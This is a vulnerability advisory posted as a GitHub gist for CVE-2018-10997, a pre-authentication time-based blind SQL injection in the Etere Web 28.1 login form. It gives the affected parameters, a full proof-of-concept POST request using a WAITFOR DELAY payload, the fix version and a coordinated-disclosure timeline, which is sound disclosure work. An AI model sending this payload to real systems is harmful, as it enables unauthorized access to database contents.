Last active
September 20, 2018 18:39
-
-
Save dmblbc/14a77036a9562407194c3cf3ee3f265e to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Technicolor Security Office - Vulnerability Advisory | |
| ####################################################################### | |
| #Title: Time-Based Blind SQL-Injection | |
| #Product: Etere Web | |
| #Homepage: https://www.etere.com/DocView/1009/ETEREWEB.aspx | |
| #Vulnerable versions: Etere Web 28.1 | |
| #CVE: CVE-2018-10997 | |
| #Impact: critical | |
| #Discoverer: Dion Bellemare | |
| ####################################################################### | |
| ----------------------------------------------------------------------- | |
| [Description] | |
| EtereWeb 28.1 has a pre-authentication blind SQL injection in the POST parameters txUserName and txPassword. | |
| ----------------------------------------------------------------------- | |
| [Vendor of Product] | |
| Etere Pte Ltd | |
| ----------------------------------------------------------------------- | |
| [Affected Product Code Base] | |
| EtereWeb - 28.1 | |
| ----------------------------------------------------------------------- | |
| [Attack Type] | |
| Remote | |
| ----------------------------------------------------------------------- | |
| [Impact Information Disclosure] | |
| true | |
| ----------------------------------------------------------------------- | |
| [CVE Impact Other] | |
| An attacker can exploit this vulnerability to disclose sensitive database (MSSQL DBMS) information and contents. In some installation scenarios it may be possible to compromise the remote system and take full control. | |
| ----------------------------------------------------------------------- | |
| [Has vendor confirmed or acknowledged the vulnerability?] | |
| true | |
| ----------------------------------------------------------------------- | |
| [Proof Of Concept] | |
| Target: http://etere.example.com/etereweb/ | |
| Target Parameters: txUserName (POST) | |
| Target Parameters: txPassword (POST) | |
| POST /etereweb/ HTTP/1.1 | |
| Host: etere.example.com | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Referer: http://etere.example.com/etereweb/ | |
| Cookie: ASP.NET_SessionId=0ep1w51ja4yezeubp2m15vo0 | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 750 | |
| txUserName=' WAITFOR DELAY '0:0:5'--&txPassword='&btnAccedi=Login&hdIdUser= | |
| ----------------------------------------------------------------------- | |
| [Solution] | |
| Upgrade EtereWeb to version 28.1.20 or greater | |
| ----------------------------------------------------------------------- | |
| [Advisory History] | |
| 2018-05-02 - Initial discovery and write-up of vuln advisory | |
| 2018-05-02 - Sent notification email to Etere contact | |
| 2018-05-03 - Received initial response from Etere | |
| 2018-05-08 - Sent email to suggest using PGP to encrypt email | |
| 2018-05-29 - Additional details of vuln provided to Etere | |
| 2018-05-31 - Etere responds that vuln is fixed in version 28.1.20 | |
| ----------------------------------------------------------------------- | |
| [Discoverer] | |
| Dion Bellemare |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment